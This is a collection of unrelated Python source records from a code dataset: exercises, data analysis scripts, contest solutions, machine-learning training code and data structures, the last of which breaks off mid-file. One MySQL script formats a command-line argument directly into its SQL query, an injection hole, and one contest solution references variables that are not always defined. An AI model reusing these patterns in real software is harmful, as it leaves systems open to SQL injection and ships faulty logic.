(len(map_str) % 8)) % 8\n pad = '0' * pad_length\n\n map_string = '1111%s%s' % (map_str, pad)\n map_string = str(hex(int(map_string, 2)))\n\n map_string = map_string[3:]\n\n file = open(\"map_string.txt\", \"w+\")\n file.write(map_string)\n file.close()\n\n return map_string\n","sub_path":"Algo,Android,RPI/Algorithm/MDP_12_03_19/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":14108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345906473","text":"# Create string using Four ways\n# first is \" \" (Double Quotation)\n# Second is ' ' (Single Quotation)\n# Third is \"\"\" \"\"\" (Triple Double Quotation) it's use for sentences\n# Four is ''' ''' (Triple Single Quotation) it's use for sentences\n# its wrong method \" ' or ' \"\n\ntext1 = \"Hello World!\"\nprint(text1)\n\ntext2 = 'Hello World!'\nprint(text2)\n\ntext3 = \"\"\"Hello\nMy name is Raza\nLearning Python\"\"\"\nprint(text3)\n\ntext3 = '''Hello\nMy name is Raza\nLearning Python'''\nprint(text3)\n","sub_path":"string_1.py","file_name":"string_1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562281559","text":"#!/usr/bin/python3\n\"\"\"\nLists all states from the database hbtn_0e_0_usa where name matches\nwith the given argument.\n\"\"\"\n\nimport MySQLdb\nfrom sys import argv\n\n\nif __name__ == '__main__':\n try:\n db = MySQLdb.connect(\n 
host=\"localhost\",\n port=3306,\n user=argv[1],\n passwd=argv[2],\n db=argv[3],\n charset=\"utf8\"\n )\n cursor = db.cursor()\n cursor.execute(\n \"SELECT * FROM states WHERE name LIKE '{:s}' ORDER BY id ASC\"\n .format(argv[4])\n )\n rows = cursor.fetchall()\n for row in rows:\n if row[1] == argv[4]:\n print(row)\n cursor.close()\n db.close()\n except Exception as e:\n print(\"Error: {}\".format(e))\n","sub_path":"0x0F-python-object_relational_mapping/2-my_filter_states.py","file_name":"2-my_filter_states.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"239126905","text":"import requests\nimport json\nimport os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\n# #######-------------image client------------#######\n\npeoples = ['jiangzemin', 'hujintao', 'xijinping', 'dengxiaoping', 'wenjiabao', 'maozedong', 'zhouenlai']\n\nresult = {}\n\n\nclass ImageEmbClass():\n \"Stores the paths to images for a given class\"\n\n def __init__(self, class_name, name, emb_vector):\n self.cls = class_name\n self.name = name\n self.emb = emb_vector\n\n def __str__(self):\n return self.cls + ',' + self.name + ', ' + str(len(self.emb))\n\n def __len__(self):\n return len(self.cls)\n\n\ndataset = []\n\n\nimage_dir = 'F:/baidu_crop/'\n\n# for i in image_pic:\n # img_path = os.path.join(image_dir, i)\n\n # img_path = 'F:/baidu_crop/dengxiaoping_baidu/0.png'\n # img_path = 'F:/peoples_baidu/jiangzemin_baidu/146.jpg'\n # img = misc.imread(os.path.expanduser(img_path), mode='RGB')\n # faces, det_arr = load_and_align_data(img)\n\npath_exp = os.path.expanduser(image_dir)\nprint('path expanduser is {}'.format(path_exp))\nclasses = [path for path in os.listdir(path_exp) \\\n if os.path.isdir(os.path.join(path_exp, path))]\nclasses.sort()\nnrof_classes = len(classes)\nprint('have {} class(es), and class is {}'.format(nrof_classes, classes))\nfor i in range(nrof_classes):\n class_name = classes[i]\n facedir = os.path.join(path_exp, class_name)\n for j in os.listdir(facedir):\n img_path = os.path.join(facedir,j)\n file_name = j\n\n files = {\"file\": open(img_path, \"rb\")}\n # r = requests.post(\"http://192.168.1.254:5001/v1/face_censor\", files=files)\n r = requests.post(\"http://0.0.0.0:5000/upload\", files=files)\n returnval = json.loads(r.text)\n\n dataset.append(ImageEmbClass(class_name, file_name, returnval['emb']))\n\n print(returnval)\n\n\n # image_show = cv2.cvtColor(np.reshape(int(returnval['image_data']), (182,182, 3)))\n # cv2.imshow(image_show)\n # cv2.waitKey()\n\n\n\n","sub_path":"faceNet/get_emb_serving/img_client.py","file_name":"img_client.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286974611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 5 08:17:45 2019\r\n\r\n@author: iloo\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import os\r\n\r\n\"\"\"\r\nnumeric: price, minimum_nights, number_of_review,\r\ncalculated_host_listings_count, availability_365, reviews_per_month\r\n\r\nlast_review\r\nlatitude, longitude\r\n\r\ncategorical: id, host_id, host_name, neighbourhood_group\r\nneighbourhood, room_type\r\n\r\nQuestions:\r\n What can we learn about different hosts and areas?\r\n What can we learn from predictions? 
(Locations, prices, reviews, etc)\r\n Which hosts are the busiest and why?\r\n Is there any noticeable difference of traffic among different areas \r\n and what could be the reason for it?\r\n\"\"\"\r\n\r\ndef dataE(df):\r\n desc = df.describe()\r\n for i in range(2,len(desc.columns)):\r\n print(desc.iloc[:,i])\r\n print('\\n')\r\n desc1 = df.describe(include='object')\r\n for i in range(len(desc1.columns)):\r\n print(desc1.iloc[:,i])\r\n print('\\n')\r\n \r\n null_list = []\r\n null_val = []\r\n for i in range(len(df.columns)):\r\n if df.iloc[:,i].isnull().values.any():\r\n nulls = df.columns[i]\r\n nulls_num = df.iloc[:,i].isnull().sum()\r\n null_list.append(nulls)\r\n null_val.append(nulls_num)\r\n print('Missing Values...')\r\n print(null_list)\r\n print(null_val)\r\n\r\n\"\"\"\r\nMissing values: name, host_name, last_review, reviews_per_month\r\n\"\"\"\r\n\r\ndef dataE1(df):\r\n #Using only price, minimum_nights, number_of_review\r\n #calculated_host_listings_count, availability_365\r\n dfnumeric = df[['price','minimum_nights','number_of_reviews',\r\n 'calculated_host_listings_count','availability_365']]\r\n corr = dfnumeric.corr()\r\n \r\n namelist = np.asarray(dfnumeric.columns,dtype=str)\r\n for name1 in namelist:\r\n namelist = namelist[namelist != name1]\r\n for name2 in namelist:\r\n plt.figure(figsize=(8,8))\r\n plt.scatter(dfnumeric[name1],dfnumeric[name2])\r\n plt.title('%s VS %s' %(name1,name2))\r\n plt.show()\r\n return corr\r\n\r\n\"\"\"\r\nThings don't seem to be correlated at all. Which is good. Independent of each other.\r\nLets try with the name variables and make bar graphs\r\n\"\"\"\r\n\r\ndef dataE2(df):\r\n #Use Room Type... Neighborhood and Neighborhood Group have too many unique\r\n dfnumeric = df[['price','minimum_nights','number_of_reviews',\r\n 'calculated_host_listings_count','availability_365']]\r\n room_type = df['room_type']\r\n rtuniq = room_type.unique()\r\n \r\n index1 = room_type == rtuniq[0]\r\n index2 = room_type == rtuniq[1]\r\n index3 = room_type == rtuniq[2]\r\n \r\n namelist = np.asarray(dfnumeric.columns,dtype=str)\r\n \r\n for name in namelist:\r\n namedf1 = dfnumeric.loc[index1,name].to_numpy() \r\n namedf2 = dfnumeric.loc[index2,name].to_numpy()\r\n namedf3 = dfnumeric.loc[index3,name].to_numpy()\r\n boxplotdata = [namedf1,namedf2,namedf3]\r\n plt.figure(figsize=(10,10))\r\n plt.boxplot(boxplotdata,labels = [rtuniq[0],rtuniq[1],rtuniq[2]])\r\n plt.title('%s by Room Type' %(name))\r\n \r\n plt.show() \r\n\r\nif __name__ == '__main__':\r\n df = pd.read_csv('AB_NYC_2019.csv',index_col=False)\r\n dataE(df)\r\n dataE1(df)\r\n dataE2(df)\r\n\r\n","sub_path":"NYC AirBNB/NYCAB_DE.py","file_name":"NYCAB_DE.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"604319936","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import fetch_openml\nfrom sklearn import metrics\nfrom sklearn.svm import SVC\nimport matplotlib.pyplot as plt\n\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX = X /255.0\n\nprint(\"fetched !\")\n\nX_train, X_test = X[:1000], X[1000:] ; y_train, y_test = y[:1000], y[1000:]\n\n\nmodel_SVC_wr = SVC(C=10, gamma=0.001, kernel=\"rbf\")\nmodel_SVC_wr.fit(X_train, y_train)\ny_predict_SVC_wr = model_SVC_wr.predict(X_test)\n\n\nmodel_SVC_wor = SVC(C=1000, gamma=0.001, kernel=\"rbf\")\nmodel_SVC_wor.fit(X_train, y_train)\ny_predict_SVC_wor = 
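In practical_SVC.py here, both result labels read "using regularization", although the C=1000 run is presumably the "without regularization" case that the _wor variable names suggest. Rather than comparing two hand-picked settings, a small grid search over the same values selects C directly (a sketch; X_train and y_train are the arrays already prepared in this record):

from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC

search = GridSearchCV(SVC(kernel="rbf", gamma=0.001), {"C": [10, 1000]}, cv=3)
search.fit(X_train, y_train)   # X_train/y_train as prepared earlier in this record
print(search.best_params_, search.best_score_)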
model_SVC_wor.predict(X_test)\n\n\nprint(\"SVC Model using regularization accuracy: \\t\", \n metrics.accuracy_score(y_test, y_predict_SVC_wr), \"\\n\")\nprint(\"SVC Model using regularization accuracy: \\t\",\n metrics.accuracy_score(y_test, y_predict_SVC_wor), \"\\n\")\n\n","sub_path":"HW-2/practical_SVC.py","file_name":"practical_SVC.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277862731","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport accounts.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('gender', models.CharField(blank=True, help_text='Select a gender for the user profile', max_length=6, verbose_name='User gender', choices=[(b'Male', 'Male'), (b'Female', 'Female')])),\n ('measures', models.CharField(help_text='Measures for this user', max_length=300, verbose_name='User measures')),\n ('image_profile', models.ImageField(default=b'/static/accounts/img/profile-photo.png', upload_to=accounts.models.get_file_path, blank=True, help_text='Upload an image for the user profile', verbose_name='User image profile')),\n ('authentication_user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'User',\n 'verbose_name_plural': 'Users',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"fitme/accounts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"85723531","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n# sort 내장함수 사용\nT = int(input())\nfor _ in range(T):\n test_num, tc = input().split()\n tc = int(tc)\n numbers = input().split()\n earth_num = {\"ZRO\" : 0, \"ONE\" : 1, \"TWO\" : 2, \"THR\" : 3, \"FOR\" : 4, \"FIV\" : 5, \"SIX\" : 6, \"SVN\" : 7, \"EGT\" : 8, \"NIN\" : 9}\n\n for i in range(tc):\n numbers[i] = earth_num[numbers[i]]\n numbers.sort()\n for i in range(tc):\n for key, value in earth_num.items():\n if numbers[i] == value:\n numbers[i] = key\n break\n\n print(\"{} {}\".format(test_num, ' '.join(numbers)))\n\n","sub_path":"SWEA/1221_GNS/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149220660","text":"#!/usr/bin/env python\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import random_split\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport time\nimport pandas as pd\nfrom customDataset import HCPanatDataset, CropBorders3D\nfrom cnn import Conv3DNet, training_loop_conv, validate_conv\n\ntorch.set_printoptions(edgeitems=2)\ntorch.manual_seed(0)\n\n#filenames\n#src_dir = '../data/HCP-anat-data'\nsrc_dir = '../data/HCP-anat'\nimg_dir = src_dir + '/images-three-classes/'\ntarget_file = src_dir + '/annotations-three-classes.csv'\ndataset = HCPanatDataset(csv_file=target_file, root_dir=img_dir)\n\n#hyperparameters\nn_crop = 5\nperc_train = 0.85\nn_epochs 
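The GNS record above converts digits back to words by re-scanning the dictionary for every value; inverting the mapping once makes the round trip direct. A sketch on sample input:

earth_num = {"ZRO": 0, "ONE": 1, "TWO": 2, "THR": 3, "FOR": 4,
             "FIV": 5, "SIX": 6, "SVN": 7, "EGT": 8, "NIN": 9}
num_earth = {v: k for k, v in earth_num.items()}
words = ["NIN", "ONE", "FIV"]
print(' '.join(num_earth[n] for n in sorted(earth_num[w] for w in words)))
# ONE FIV NIN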
= 20\nbatch_size = 4\nlearning_rate = 1e-3\n\n#apply some transformation to the data (crop)\ntransformed_dataset = HCPanatDataset(\n csv_file=target_file, \n root_dir=img_dir, \n transform=transforms.Compose([\n CropBorders3D(n_crop)]))\n\n#check dimensions\nt1, _ = transformed_dataset[0]\nprint(\"Shape of one image after cropping %i slices at the borders:\" %n_crop)\nprint(t1.shape)\n\n#compute the mean and std of the data\nmax_dim = len(t1.shape) #concatenating dimension\nimgs = np.stack([img for img, _ in transformed_dataset], axis=max_dim)\nmean = np.mean(imgs)\nstd = np.std(imgs)\nmean, std\n\n#normalize the data\nnormalized_dataset = HCPanatDataset(\n csv_file=target_file, \n root_dir=img_dir, \n transform=transforms.Compose([\n CropBorders3D(n_crop),\n transforms.ToTensor(),\n transforms.Normalize(mean,std)]))\n\n#split the dataset into training and test sets with torch.utils.data.random_split\nN = len(normalized_dataset)\ntrain_set, test_set = random_split(normalized_dataset, [int(perc_train*N), N-int(perc_train*N)]) \nprint(\"Total number of images: %i\" %N)\nprint(\"Number of training images: %i\" %(perc_train*N))\nprint(\"Number of test images: %i\" %(N-int(perc_train*N)))\n\n#infer number of features\nn_in = imgs.shape[0] * imgs.shape[1] * imgs.shape[2] #number of input features\nlabels = pd.read_csv(target_file)['label']\nn_out = len(np.unique(labels)) #number of output features, i.e. number of classes\nprint(\"The number of input feature is: %i\" %n_in)\nprint(\"The number of output feature is: %i\" %n_out)\n\n#assuming that we are on a CUDA machine, this should print a CUDA device:\ndevice = (torch.device('cuda') if torch.cuda.is_available() \n else torch.device('cpu'))\nprint(f\"Training on device {device}.\")\n\n#define the model, the optimizer and the loss\nin_shape3d = t1.shape\nconv_model = Conv3DNet(in_shape3d, n_out=n_out).to(device=device)\noptimizer = optim.SGD(conv_model.parameters(), lr=learning_rate)\nloss_fn = nn.CrossEntropyLoss()\n\n#split the datasets into batches\ntrain_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\ntest_loader = DataLoader(dataset=test_set, batch_size=batch_size, shuffle=True)\n\n#training and showing also validation loss\nt0 = time.time()\nloss_vector, loss_val_vector = training_loop_conv(\n model = conv_model,\n train_loader = train_loader,\n test_loader = test_loader,\n criterion = loss_fn,\n optimizer = optimizer,\n n_epochs = n_epochs)\nprint(\"Training time = %f seconds\" %(time.time()-t0))\n\n#plot training and validation loss\nplt.figure()\nx_axis = np.arange(n_epochs)\nplt.plot(x_axis, loss_vector, 'r--', label='loss train')\nplt.plot(x_axis, loss_val_vector, 'g--', label='loss val')\nplt.ylim(0, 0.6)\nplt.legend()\nplt.xlabel(\"epochs\")\nplt.ylabel(\"loss\")\nplt.savefig('training_validation_losses.png')\n\n#compute accuracy in training and validation\nvalidate_conv(conv_model, train_loader, test_loader)\n\nnumel_list = [p.numel()\n for p in conv_model.parameters()\n if p.requires_grad == True]\nsum(numel_list), numel_list","sub_path":"code/convolution_nn_gpu_3classes.py","file_name":"convolution_nn_gpu_3classes.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117984220","text":"def solve(a):\n memo = [-1]*(len(a)+1)\n return jp(a,memo)\ndef jp(x,memo):\n y = len(x)\n if memo[y] != -1:\n return memo[y]\n if y == 0:\n memo[y] = 0\n return memo[y]\n elif y == 1:\n memo[y] = 0\n return memo[y]\n elif y 
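convolution_nn_gpu_3classes.py above materializes the whole dataset with np.stack just to obtain the mean and standard deviation; accumulating the first two moments keeps memory flat. A sketch with stand-in arrays:

import numpy as np

total = total_sq = count = 0.0
for img in (np.ones((4, 4)), np.zeros((4, 4))):   # stand-ins for the dataset loop
    total += img.sum()
    total_sq += np.square(img).sum()
    count += img.size
mean = total / count
std = np.sqrt(total_sq / count - mean ** 2)
print(mean, std)                                  # 0.5 0.5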
== 2:\n memo[y] = x[1]\n return memo[y]\n else:\n best = -1\n a = jp(x[2:],memo)+x[1]\n b = jp(x[3:],memo)+x[2]\n if len(x) >= 4:\n c = jp(x[4:],memo)+x[3]\n if len(x) >= 5:\n d = jp(x[5:],memo)+x[4]\n if len(x) >= 6:\n e = jp(x[6:],memo)+x[5]\n memo[y] = max(a,b,c,d,e)\n return memo[y]\ninp = int(input())\nfor i in range(1,inp+1):\n a = input()\n l = list(map(int,input().split()))\n print(\"Case \",i,\" :\",solve(l),sep = '')\n \n \n \n","sub_path":"Lomba Lomba/ICPC-Maranatha-2018/ICPC-G.py","file_name":"ICPC-G.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"395613479","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\nimport psycopg2\n\n\ndef connect(database_name=\"tournament\"):\n \"\"\"Connect to the PostgreSQL database. :returns: a database connection.\n :param database_name: Gives a name to the database. Default: 'tournament'\"\"\"\n try:\n db = psycopg2.connect(\"dbname={}\".format(database_name))\n cursor = db.cursor()\n return db, cursor\n except Exception:\n print(\"Failed to connect to database\")\n\ndef delete_matches():\n \"\"\"Remove all the match records from the database.\n \"\"\"\n db_query(\"DELETE FROM matches;\")\n\n\ndef delete_players():\n \"\"\"Remove all the player records from the database.\n \"\"\"\n db_query(\"DELETE FROM players;\")\n\n\ndef count_players():\n \"\"\":returns: the number of players currently registered.\n \"\"\"\n count = data_pull(\"SELECT count(*) FROM players;\")\n return count[0][0]\n\n\ndef register_player(name):\n \"\"\"Adds a player to the tournament database.\n\n The database assigns a unique serial id number for the player. (This\n should be handled by your SQL database schema, not in your Python code.)\n\n :param name: the player's full name (need not be unique).\n \"\"\"\n sql = \"INSERT INTO players (name) VALUES (%s)\"\n data = (name, )\n db_query(sql, data)\n\n\ndef player_standings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place,\n or a player\n tied for first place if there is currently a tie.\n\n\n :returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n standings = data_pull(\"SELECT * FROM standings_view\")\n return standings\n\n\ndef report_match(winner, loser, draw=False):\n \"\"\"Records the outcome of a single match between two players.\n\n when draw = FALSE, both players have the match number incremented, the\n winner increments wins by 1, and the losers's number of wins is added to the\n o_points.\n when draw = TRUE, increments draw and matches in both players, each other's\n wins are added to the other's o_points\n\n :param winner: the id number of the player who won\n :param loser: the id number of the player who lost\n :param draw: boolean determining if the match was a draw.\n \"\"\"\n sql = \"INSERT INTO matches (winner, loser, draw) VALUES (%s, %s, %s)\"\n data = (winner, loser, draw,)\n db_query(sql, data)\n\n\ndef swiss_pairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. 
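In ICPC-G.py above, max(a,b,c,d,e) raises a NameError whenever len(x) < 6, because c, d and e are bound only inside the length guards. Collecting the candidates in one expression avoids the unbound names; jp_safe below is a hypothetical rewrite of the same recurrence:

def jp_safe(x, memo):
    y = len(x)
    if memo[y] != -1:
        return memo[y]
    if y <= 1:
        memo[y] = 0
    elif y == 2:
        memo[y] = x[1]
    else:
        memo[y] = max(jp_safe(x[k:], memo) + x[k - 1]
                      for k in range(2, min(y, 6) + 1))
    return memo[y]

print(jp_safe([3, 1, 4, 1], [-1] * 5))   # 4; the original raises NameError here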
Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n :returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n standing = player_standings()\n previous_matches = data_pull(\"SELECT winner, loser FROM matches\")\n pairs = []\n\n while len(standing) > 1:\n player1 = standing.pop()\n player2 = standing.pop()\n\n if set((player1[0], player2[0])) in previous_matches:\n replace = standing.pop()\n standing.append(player2)\n pairs.append((player1[0], player1[1], replace[0], replace[1]))\n else:\n pairs.append((player1[0], player1[1], player2[0], player2[1]))\n\n return pairs\n\n\ndef db_query(query, data=None):\n \"\"\"Function for querying the database\n\n Connects to db, selects cursor, passes query to db, commits, and closes\n the connection.\n\n Args:\n query: String to query the database\n data: The information to be injected to the query. Can be left blank\n\n \"\"\"\n conn, c = connect()\n c.execute(query, data)\n conn.commit()\n conn.close()\n\n\ndef data_pull(query, data=None):\n \"\"\" Function for querying the database to retrieve data\n\n Connects to db, selects cursor, passes query to db, saves data, closes\n the connection, then returns the data\n\n Args:\n query: String to query the database\n data: The information to be injected to the query. Can be left blank\n\n Returns:\n Data from pulled from the database\n \"\"\"\n conn, c = connect()\n c.execute(query, data)\n data = c.fetchall()\n conn.close()\n return data\n\n","sub_path":"vagrant/tournament/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55061496","text":"#!/usr/bin/env python\n\nimport copy\nimport optparse\nimport subprocess\nimport sys\n\n\nbenchmarks = [\n 'jacobi-1d',\n 'jacobi-1d-5pt',\n 'jacobi-1d-7pt',\n 'jacobi-2d',\n 'jacobi-3d',\n 'poisson-2d',\n 'fdtd-2d',\n 'rician-2d',\n 'gradient-2d'\n]\n\nblock_sizes = [\n [16, 8],\n [32, 8],\n [48, 8],\n [64, 8],\n [80, 8],\n [16, 4],\n [32, 4],\n [48, 4],\n [64, 4],\n [80, 4]\n\n# [96, 4],\n# [32, 12],\n# [80, 4],\n# [16, 4]\n\n# [64, 4]\n\n# [96, 4],\n# [64, 4],\n# [128, 8],\n# [32, 4],\n# [128, 1],\n# [16, 10, 2]\n]\n\n\nparser = optparse.OptionParser()\nparser.add_option('-j', '--jar', dest='jar',\n action='store', type='string',\n help='WEKA Class Path')\nparser.add_option('-c', '--classifier', dest='classifier',\n action='store', type='string',\n default='weka.classifiers.lazy.IBk',\n help='WEKA Classifier')\nparser.add_option('-d', '--device', dest='device',\n action='store', type='string',\n help='Device name')\nparser.add_option('-a', '--train-all', dest='train_all',\n action='store_true', default=False,\n help='Train on all block sizes')\nparser.add_option('-t', '--test-all', dest='test_all',\n action='store_true', default=False,\n help='Test on all block sizes')\n\n\n\n\n(options, args) = parser.parse_args()\n\nweka_log = open('weka.log', 'w')\n\nfor left_out in benchmarks:\n\n print('Testing on %s' % left_out)\n\n remaining = copy.deepcopy(benchmarks)\n remaining.remove(left_out)\n\n training_file = open('training.csv', 'w')\n first = True\n\n # Build training data\n for trainer in remaining:\n if options.train_all:\n data = open('%s-scaling.%s.csv' % 
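tournament.py above opens a fresh connection per call and closes it by hand; psycopg2 connections and cursors also work as context managers, so data_pull could be sketched as (same dbname assumed):

import psycopg2

def data_pull(query, data=None):
    conn = psycopg2.connect("dbname=tournament")
    try:
        with conn, conn.cursor() as cur:   # commits on success, rolls back on error
            cur.execute(query, data)
            return cur.fetchall()
    finally:
        conn.close()                       # the with-block does not close it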
(trainer, options.device))\n args = ['../../scripts/extract-features.py']\n if first:\n args.append('-p')\n first=False\n subprocess.call(args, stdout=training_file, stdin=data)\n data.close()\n else:\n for bs in block_sizes:\n data = open('%s-scaling.%s.csv' % (trainer, options.device))\n args = ['../../scripts/extract-features.py']\n args.append('-x')\n args.append(str(bs[0]))\n args.append('-y')\n args.append(str(bs[1]))\n if first:\n args.append('-p')\n first=False\n subprocess.call(args, stdout=training_file, stdin=data)\n data.close()\n\n training_file.close()\n\n # Build the model\n args = ['java', '-cp', options.jar, options.classifier, '-t',\n 'training.csv', '-d', 'testing.model', '-no-cv']\n subprocess.call(args, stdout=weka_log, stderr=weka_log)\n\n # Build the test data\n test_file = open('test.csv', 'w')\n\n first = True\n if options.test_all:\n args = ['../../scripts/extract-features.py']\n if first:\n args.append('-p')\n first = False\n data = open('%s-scaling.%s.csv' % (left_out, options.device))\n subprocess.call(args, stdout=test_file, stdin=data)\n data.close()\n else:\n for bs in block_sizes:\n args = ['../../scripts/extract-features.py']\n args.append('-x')\n args.append(str(bs[0]))\n args.append('-y')\n args.append(str(bs[1]))\n if first:\n args.append('-p')\n first = False\n data = open('%s-scaling.%s.csv' % (left_out, options.device))\n subprocess.call(args, stdout=test_file, stdin=data)\n data.close()\n\n test_file.close()\n\n # Test the model\n args = ['java', '-cp', options.jar, options.classifier, '-T',\n 'test.csv', '-l', 'testing.model', '-p', '0']\n proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n args = ['../../scripts/parse-weka-results.py']\n subprocess.call(args, stdin=proc.stdout)\n\n \nweka_log.close()\n","sub_path":"scripts/run-weka.py","file_name":"run-weka.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48945987","text":"\"\"\"\nThis module contains functions to add actors to a scene according to a formation defined in YAML.\n\nSee game/formations/invaders.yaml for a simple example of a formation file. 
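run-weka.py above does all its plumbing with bare subprocess.call and manual pipes; on Python 3.7+, subprocess.run can capture one step's output and verify its exit status in a single call. A sketch with a stand-in command:

import subprocess

step = subprocess.run(["java", "-version"], capture_output=True,
                      text=True, check=True)
print(step.stderr.strip().splitlines()[0])   # java reports its version on stderr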
These functions are called by a scene with four arguments: the scene object, the x and y offsets, and the corresponding dictionary from the YAML.\n\"\"\"\n\nimport pyglet\n\nimport actor\nimport util\n\ndef single(scn, x, y, attrs):\n \"\"\"Simplest shape, a lone actor\"\"\"\n new_actor = actor.Actor(scn, scn.batch, kind=attrs['sprite'], \n x=attrs['x']+x, y=attrs['y']+y)\n scn.actors[new_actor.name] = new_actor\n return [new_actor]\n\ndef grid(scn, x, y, attrs):\n \"\"\"An attrs['rows'] x attrs['columns'] grid of actors centered at (x, y) at intervals of (attrs['padding_x'], attrs['padding_y'])\"\"\"\n \n new_actors = []\n origin_x = -attrs['columns']*attrs['padding_x']/2+attrs['x']+x+attrs['padding_x']/2\n origin_y = -attrs['rows']*attrs['padding_y']/2+attrs['y']+y+attrs['padding_y']/2\n for item_x in range(attrs['columns']):\n for item_y in range(attrs['rows']):\n new_actor = actor.Actor(scn, scn.batch, kind=attrs['sprite'],\n x=origin_x+item_x*attrs['padding_x'], \n y=origin_y+item_y*attrs['padding_y'])\n scn.actors[new_actor.name] = new_actor\n new_actors.append(new_actor)\n return new_actors\n","sub_path":"engine/formations.py","file_name":"formations.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546852288","text":"__author__ = 'ash31891'\n\nfrom collections.abc import Iterable\nimport set\n\nclass LinkedHashTable (set.SetType, Iterable):\n\n __slots__ = 'LOAD_LIMIT', 'back', 'front', 'size', 'table', 'INITIAL_NUM_BUCKETS', 'MIN_BUCKETS'\n\n def __init__(self, initial_num_buckets=100, load_limit=0.75):\n\n set.SetType.__init__( self )\n self.MIN_BUCKETS = 10\n self.INITIAL_NUM_BUCKETS = self.MIN_BUCKETS if initial_num_buckets < self.MIN_BUCKETS else initial_num_buckets\n self.table = initial_num_buckets * [ None ]\n self.LOAD_LIMIT = load_limit\n self.front = self.ChainNode(None)\n self.back = self.ChainNode(None)\n\n class ChainNode (object):\n\n __slots__ = 'chain', 'link', 'obj', 'prev'\n\n def __init__(self, obj, prev=None, link=None, chain=None):\n\n self.obj = obj\n self.prev = prev\n self.link = link\n self.chain = chain\n\n def __str__( self ):\n return \"(\" + str( self.obj ) + \")\"\n\n def __iter__(self):\n \"\"\"\n Build an iterator.\n :return: an iterator for the current elements in the set\n \"\"\"\n node = self.front\n while node is not None:\n yield node.obj\n node = node.link\n\n def add(self, obj):\n \"\"\"\n Insert a new object into the set.\n Do not add if self.contains(obj).\n :param obj: the object to add\n :return: None\n :post: self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor >= self.LOAD_LIMIT:\n self._rehashExpand()\n\n if self.contains(obj):\n #print('Duplicate Value')\n pass\n else:\n index = hash (obj) % len(self.table)\n front = self.table[ index ]\n if self.size == 0:\n current = LinkedHashTable.ChainNode(obj)\n self.front = current\n self.back = current\n self.table[ index ] = current\n self.size += 1\n else:\n current = LinkedHashTable.ChainNode(obj, self.back, None, None)\n self.back.link = current\n self.back = current\n self.size += 1\n if front is None:\n self.table[index] = current\n #elif front.chain is not None:\n else:\n while front.chain is not None:\n front = front.chain\n front.chain = current\n #else:\n #print(self.size , self.back.obj, self.front.obj)\n\n def contains(self, obj):\n \"\"\"\n Is the given obj in the set?\n The answer is determined through use of the '==' operator,\n i.e., 
